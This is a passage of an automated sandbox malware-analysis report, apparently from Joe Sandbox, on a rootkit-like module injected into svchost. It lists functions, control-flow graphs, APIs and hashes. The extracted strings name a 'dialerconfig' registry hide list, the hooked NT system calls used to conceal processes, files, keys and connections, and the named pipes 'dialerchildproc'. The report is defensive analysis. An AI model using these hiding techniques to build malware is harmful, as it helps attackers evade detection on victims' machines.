                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301820
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301840
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130185B
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130187B
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301896
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613018A0
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 99b07525fd2711d8e82b8b49fba128a9359a21ce05ef994d83d7f8484eb62716
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: F3314171B00A4593FF509B26DA4D3A963FCAB46FCAF0C54219E0BA7295FF1CC459C292
                                                        Function 000002A661303844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 57 2a661303844-2a66130384f 58 2a661303869-2a661303870 57->58 59 2a661303851-2a661303864 StrCmpNIW 57->59 59->58 60 2a661303866 59->60 60->58
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: 84d7da99e8808b0adfb76846f8b28e16625e6655772c6f218550ef611b4de524
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: 59D0A760B512498BFF14DFE688CDA603798EB09F45F8C4034D90213150DF6C8A9D9711
                                                        Function 000002A6612D273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 1627250a6f1587746d6adcb486bc21ae0d1f8d3e6a0bb4f849c2ff22e67d6bd2
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: DC61F0B2F016908BDB548F25D0487ADB3AEFB55FA4F688121DE5907788DF38D89AC701

                                                        Non-executed Functions

                                                        Function 000002A661302B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 367 2a661302b2c-2a661302ba5 call 2a661322ce0 370 2a661302bab-2a661302bb1 367->370 371 2a661302ee0-2a661302f03 367->371 370->371 372 2a661302bb7-2a661302bba 370->372 372->371 373 2a661302bc0-2a661302bc3 372->373 373->371 374 2a661302bc9-2a661302bd9 GetModuleHandleA 373->374 375 2a661302bdb-2a661302beb call 2a661316090 374->375 376 2a661302bed 374->376 378 2a661302bf0-2a661302c0e 375->378 376->378 378->371 381 2a661302c14-2a661302c33 StrCmpNIW 378->381 381->371 382 2a661302c39-2a661302c3d 381->382 382->371 383 2a661302c43-2a661302c4d 382->383 383->371 384 2a661302c53-2a661302c5a 383->384 384->371 385 2a661302c60-2a661302c73 384->385 386 2a661302c83 385->386 387 2a661302c75-2a661302c81 385->387 388 2a661302c86-2a661302c8a 386->388 387->388 389 2a661302c9a 388->389 390 2a661302c8c-2a661302c98 388->390 391 2a661302c9d-2a661302ca7 389->391 390->391 392 2a661302d9d-2a661302da1 391->392 393 2a661302cad-2a661302cb0 391->393 394 2a661302da7-2a661302daa 392->394 395 2a661302ed2-2a661302eda 392->395 396 2a661302cc2-2a661302ccc 393->396 397 2a661302cb2-2a661302cbf call 2a66130199c 393->397 398 2a661302dbb-2a661302dc5 394->398 399 2a661302dac-2a661302db8 call 2a66130199c 394->399 395->371 395->385 401 2a661302cce-2a661302cdb 396->401 402 2a661302d00-2a661302d0a 396->402 397->396 407 2a661302dc7-2a661302dd4 398->407 408 2a661302df5-2a661302df8 398->408 399->398 401->402 403 2a661302cdd-2a661302cea 401->403 404 2a661302d3a-2a661302d3d 402->404 405 2a661302d0c-2a661302d19 402->405 412 2a661302ced-2a661302cf3 403->412 414 2a661302d4b-2a661302d58 lstrlenW 404->414 415 2a661302d3f-2a661302d49 call 2a661301bbc 404->415 405->404 413 2a661302d1b-2a661302d28 405->413 407->408 417 2a661302dd6-2a661302de3 407->417 410 2a661302dfa-2a661302e03 call 2a661301bbc 408->410 411 2a661302e05-2a661302e12 lstrlenW 408->411 410->411 436 2a661302e4a-2a661302e55 410->436 421 2a661302e14-2a661302e1e 411->421 422 2a661302e35-2a661302e3f call 2a661303844 411->422 419 2a661302cf9-2a661302cfe 412->419 420 2a661302d93-2a661302d98 412->420 423 2a661302d2b-2a661302d31 413->423 425 2a661302d5a-2a661302d64 414->425 426 2a661302d7b-2a661302d8d call 2a661303844 414->426 415->414 415->420 427 2a661302de6-2a661302dec 417->427 419->402 419->412 430 2a661302e42-2a661302e44 420->430 421->422 431 2a661302e20-2a661302e33 call 2a66130152c 421->431 422->430 423->420 432 2a661302d33-2a661302d38 423->432 425->426 435 2a661302d66-2a661302d79 call 2a66130152c 425->435 426->420 426->430 427->436 437 2a661302dee-2a661302df3 427->437 430->395 430->436 431->422 431->436 432->404 432->423 435->420 435->426 441 2a661302e57-2a661302e5b 436->441 442 2a661302ecc-2a661302ed0 436->442 437->408 437->427 446 2a661302e5d-2a661302e61 441->446 447 2a661302e63-2a661302e7d call 2a6613085c0 441->447 442->395 446->447 449 2a661302e80-2a661302e83 446->449 447->449 451 2a661302ea6-2a661302ea9 449->451 452 2a661302e85-2a661302ea3 call 2a6613085c0 449->452 451->442 454 2a661302eab-2a661302ec9 call 2a6613085c0 451->454 452->451 454->442
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 517c12f0b0e1090de60bb0fcc7bf1fefb46beb5eab338aff40a4245cd4b9731a
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 52B17C72B10A9087EB649F35D64C7A963E9F746F86F485016EE0A63B94DF39CC48C381
                                                        Function 000002A661307D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: cc74eacb843f1603229d41cad126e5c04d88afadf7cf4452611ec155d591a17a
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: E5315072705B808AEB609F60E8483ED73A8F785B44F484429DA8E67B94EF7CC54DC710
                                                        Function 000002A66130D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 36f9f4375d1256616007857bae393de0df9f8980b3b202d925a5ac7eb32d36a2
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 4A316F32714F8086DB60CF25E84839E73A8F78AB55F580125EA9E53B68DF7CC159CB41
                                                        Function 000002A661301628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: c27f832fced2d29170b0e4fb301a485cb6098ecabde165e8eb95b814a7a813c5
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: BA71F476B10E5087EB10DF65E89D69933B8FB8AF8DF081121DA4F67A68DF28C548C341
                                                        Function 000002A6613012BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 5c01c19bc0298f85c8339ea94e196dd5b5f1323890ee4be88120aa0ba9bb59bc
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: F0512776A14B8487EB50CFA2E44D35AB7B9F78AF89F094124DA4A27728DF7CC049C741
                                                        Function 000002A661301D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 147c2e2ec541b53145e726b289546c28288565d736413d3e5244b9f1f05d4738
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 8A31A064B10A5AA3EA04EBA5ED5E6D423A9B717F49F8C4113940B331659F3CC24DC3D2
                                                        Function 000002A6612D6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 209 2a6612d6910-2a6612d6916 210 2a6612d6951-2a6612d695b 209->210 211 2a6612d6918-2a6612d691b 209->211 212 2a6612d6a78-2a6612d6a8d 210->212 213 2a6612d6945-2a6612d6984 call 2a6612d6fc0 211->213 214 2a6612d691d-2a6612d6920 211->214 218 2a6612d6a8f 212->218 219 2a6612d6a9c-2a6612d6ab6 call 2a6612d6e54 212->219 232 2a6612d6a52 213->232 233 2a6612d698a-2a6612d699f call 2a6612d6e54 213->233 216 2a6612d6922-2a6612d6925 214->216 217 2a6612d6938 __scrt_dllmain_crt_thread_attach 214->217 224 2a6612d6931-2a6612d6936 call 2a6612d6f04 216->224 225 2a6612d6927-2a6612d6930 216->225 222 2a6612d693d-2a6612d6944 217->222 220 2a6612d6a91-2a6612d6a9b 218->220 230 2a6612d6aef-2a6612d6b20 call 2a6612d7190 219->230 231 2a6612d6ab8-2a6612d6aed call 2a6612d6f7c call 2a6612d6e1c call 2a6612d7318 call 2a6612d7130 call 2a6612d7154 call 2a6612d6fac 219->231 224->222 241 2a6612d6b22-2a6612d6b28 230->241 242 2a6612d6b31-2a6612d6b37 230->242 231->220 236 2a6612d6a54-2a6612d6a69 232->236 244 2a6612d69a5-2a6612d69b6 call 2a6612d6ec4 233->244 245 2a6612d6a6a-2a6612d6a77 call 2a6612d7190 233->245 241->242 246 2a6612d6b2a-2a6612d6b2c 241->246 247 2a6612d6b7e-2a6612d6b94 call 2a6612d268c 242->247 248 2a6612d6b39-2a6612d6b43 242->248 259 2a6612d6a07-2a6612d6a11 call 2a6612d7130 244->259 260 2a6612d69b8-2a6612d69dc call 2a6612d72dc call 2a6612d6e0c call 2a6612d6e38 call 2a6612dac0c 244->260 245->212 253 2a6612d6c1f-2a6612d6c2c 246->253 266 2a6612d6bcc-2a6612d6bce 247->266 267 2a6612d6b96-2a6612d6b98 247->267 254 2a6612d6b45-2a6612d6b4d 248->254 255 2a6612d6b4f-2a6612d6b5d call 2a6612e5780 248->255 262 2a6612d6b63-2a6612d6b78 call 2a6612d6910 254->262 255->262 276 2a6612d6c15-2a6612d6c1d 255->276 259->232 280 2a6612d6a13-2a6612d6a1f call 2a6612d7180 259->280 260->259 312 2a6612d69de-2a6612d69e5 __scrt_dllmain_after_initialize_c 260->312 262->247 262->276 274 2a6612d6bd5-2a6612d6bea call 2a6612d6910 266->274 275 2a6612d6bd0-2a6612d6bd3 266->275 267->266 273 2a6612d6b9a-2a6612d6bbc call 2a6612d268c call 2a6612d6a78 267->273 273->266 306 2a6612d6bbe-2a6612d6bc6 call 2a6612e5780 273->306 274->276 294 2a6612d6bec-2a6612d6bf6 274->294 275->274 275->276 276->253 299 2a6612d6a45-2a6612d6a50 280->299 300 2a6612d6a21-2a6612d6a2b call 2a6612d7098 280->300 296 2a6612d6c01-2a6612d6c11 call 2a6612e5780 294->296 297 2a6612d6bf8-2a6612d6bff 294->297 296->276 297->276 299->236 300->299 311 2a6612d6a2d-2a6612d6a3b 300->311 306->266 311->299 312->259 313 2a6612d69e7-2a6612d6a04 call 2a6612dabc8 312->313 313->259
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: e87bf346922b52b2af9168f1f418e053012b6a09ee5fcf7955fafdcfd6fac762
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 0D81CE21F106818BFA54AB66D48D399329DAF87F80F5C8125DA4987796EF3CC9CD8703
                                                        Function 000002A66130CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000002A66130CE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CEBC
                                                        • SetLastError.KERNEL32 ref: 000002A66130CED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000002A66130ECCC,?,?,?,?,000002A66130BF9F,?,?,?,?,?,000002A661307AB0), ref: 000002A66130CF2C
                                                          • Part of subcall function 000002A66130D6CC: HeapAlloc.KERNEL32 ref: 000002A66130D721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF54
                                                          • Part of subcall function 000002A66130D744: HeapFree.KERNEL32 ref: 000002A66130D75A
                                                          • Part of subcall function 000002A66130D744: GetLastError.KERNEL32 ref: 000002A66130D764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310A6B,?,?,?,000002A66131045C,?,?,?,000002A66130C84F), ref: 000002A66130CF76
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: a3ebcece3df98fd1e9725f906f8bf8db5f5c64855dc8a79f9fd7b15e885684d0
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 77417420F0128443FA68A735595D36922DD5B47FB2F1C4764A93B376E6DF2C980D8393
                                                        Function 000002A661302244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 9e913e5ef9d9d4dd90f3ca067dd4efb44e8ac8cefc28dc1332a14b226ca3e093
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 6C213A72B18A9083EB10CB65E54D35A73A4F78ABA5F580215EA5A13AA8CF7CC149CB41
                                                        Function 000002A6612D9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 467 2a6612d9944-2a6612d99ac call 2a6612da814 470 2a6612d9e13-2a6612d9e1b call 2a6612dbb48 467->470 471 2a6612d99b2-2a6612d99b5 467->471 471->470 472 2a6612d99bb-2a6612d99c1 471->472 474 2a6612d9a90-2a6612d9aa2 472->474 475 2a6612d99c7-2a6612d99cb 472->475 477 2a6612d9d63-2a6612d9d67 474->477 478 2a6612d9aa8-2a6612d9aac 474->478 475->474 479 2a6612d99d1-2a6612d99dc 475->479 482 2a6612d9da0-2a6612d9daa call 2a6612d8a34 477->482 483 2a6612d9d69-2a6612d9d70 477->483 478->477 480 2a6612d9ab2-2a6612d9abd 478->480 479->474 481 2a6612d99e2-2a6612d99e7 479->481 480->477 484 2a6612d9ac3-2a6612d9aca 480->484 481->474 485 2a6612d99ed-2a6612d99f7 call 2a6612d8a34 481->485 482->470 496 2a6612d9dac-2a6612d9dcb call 2a6612d6d40 482->496 483->470 486 2a6612d9d76-2a6612d9d9b call 2a6612d9e1c 483->486 488 2a6612d9c94-2a6612d9ca0 484->488 489 2a6612d9ad0-2a6612d9b07 call 2a6612d8e10 484->489 485->496 501 2a6612d99fd-2a6612d9a28 call 2a6612d8a34 * 2 call 2a6612d9124 485->501 486->482 488->482 493 2a6612d9ca6-2a6612d9caa 488->493 489->488 505 2a6612d9b0d-2a6612d9b15 489->505 498 2a6612d9cba-2a6612d9cc2 493->498 499 2a6612d9cac-2a6612d9cb8 call 2a6612d90e4 493->499 498->482 504 2a6612d9cc8-2a6612d9cd5 call 2a6612d8cb4 498->504 499->498 511 2a6612d9cdb-2a6612d9ce3 499->511 536 2a6612d9a2a-2a6612d9a2e 501->536 537 2a6612d9a48-2a6612d9a52 call 2a6612d8a34 501->537 504->482 504->511 509 2a6612d9b19-2a6612d9b4b 505->509 513 2a6612d9b51-2a6612d9b5c 509->513 514 2a6612d9c87-2a6612d9c8e 509->514 516 2a6612d9df6-2a6612d9e12 call 2a6612d8a34 * 2 call 2a6612dbaa8 511->516 517 2a6612d9ce9-2a6612d9ced 511->517 513->514 518 2a6612d9b62-2a6612d9b7b 513->518 514->488 514->509 516->470 520 2a6612d9cef-2a6612d9cfe call 2a6612d90e4 517->520 521 2a6612d9d00 517->521 522 2a6612d9c74-2a6612d9c79 518->522 523 2a6612d9b81-2a6612d9bc6 call 2a6612d90f8 * 2 518->523 526 2a6612d9d03-2a6612d9d0d call 2a6612da8ac 520->526 521->526 528 2a6612d9c84 522->528 548 2a6612d9c04-2a6612d9c0a 523->548 549 2a6612d9bc8-2a6612d9bee call 2a6612d90f8 call 2a6612da038 523->549 526->482 546 2a6612d9d13-2a6612d9d61 call 2a6612d8d44 call 2a6612d8f50 526->546 528->514 536->537 539 2a6612d9a30-2a6612d9a3b 536->539 537->474 552 2a6612d9a54-2a6612d9a74 call 2a6612d8a34 * 2 call 2a6612da8ac 537->552 539->537 545 2a6612d9a3d-2a6612d9a42 539->545 545->470 545->537 546->482 556 2a6612d9c7b 548->556 557 2a6612d9c0c-2a6612d9c10 548->557 567 2a6612d9c15-2a6612d9c72 call 2a6612d9870 549->567 568 2a6612d9bf0-2a6612d9c02 549->568 573 2a6612d9a8b 552->573 574 2a6612d9a76-2a6612d9a80 call 2a6612da99c 552->574 561 2a6612d9c80 556->561 557->523 561->528 567->561 568->548 568->549 573->474 577 2a6612d9df0-2a6612d9df5 call 2a6612dbaa8 574->577 578 2a6612d9a86-2a6612d9def call 2a6612d86ac call 2a6612da3f4 call 2a6612d88a0 574->578 577->516 578->577
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 681959dd6542599d6789764f186a42efd8a6d505218f830932f82b8ebb8010d4
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: C1E17C32F04B808BEB609B65D45839D77ACFB56B98F181115EE8957B99CF38C0E9C702
                                                        Function 000002A66130A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 588 2a66130a544-2a66130a5ac call 2a66130b414 591 2a66130a5b2-2a66130a5b5 588->591 592 2a66130aa13-2a66130aa1b call 2a66130c748 588->592 591->592 593 2a66130a5bb-2a66130a5c1 591->593 595 2a66130a5c7-2a66130a5cb 593->595 596 2a66130a690-2a66130a6a2 593->596 595->596 600 2a66130a5d1-2a66130a5dc 595->600 598 2a66130a6a8-2a66130a6ac 596->598 599 2a66130a963-2a66130a967 596->599 598->599 603 2a66130a6b2-2a66130a6bd 598->603 601 2a66130a969-2a66130a970 599->601 602 2a66130a9a0-2a66130a9aa call 2a661309634 599->602 600->596 604 2a66130a5e2-2a66130a5e7 600->604 601->592 605 2a66130a976-2a66130a99b call 2a66130aa1c 601->605 602->592 614 2a66130a9ac-2a66130a9cb call 2a661307940 602->614 603->599 607 2a66130a6c3-2a66130a6ca 603->607 604->596 608 2a66130a5ed-2a66130a5f7 call 2a661309634 604->608 605->602 611 2a66130a6d0-2a66130a707 call 2a661309a10 607->611 612 2a66130a894-2a66130a8a0 607->612 608->614 618 2a66130a5fd-2a66130a628 call 2a661309634 * 2 call 2a661309d24 608->618 611->612 623 2a66130a70d-2a66130a715 611->623 612->602 615 2a66130a8a6-2a66130a8aa 612->615 620 2a66130a8ba-2a66130a8c2 615->620 621 2a66130a8ac-2a66130a8b8 call 2a661309ce4 615->621 656 2a66130a648-2a66130a652 call 2a661309634 618->656 657 2a66130a62a-2a66130a62e 618->657 620->602 627 2a66130a8c8-2a66130a8d5 call 2a6613098b4 620->627 621->620 636 2a66130a8db-2a66130a8e3 621->636 629 2a66130a719-2a66130a74b 623->629 627->602 627->636 633 2a66130a887-2a66130a88e 629->633 634 2a66130a751-2a66130a75c 629->634 633->612 633->629 634->633 637 2a66130a762-2a66130a77b 634->637 638 2a66130a9f6-2a66130aa12 call 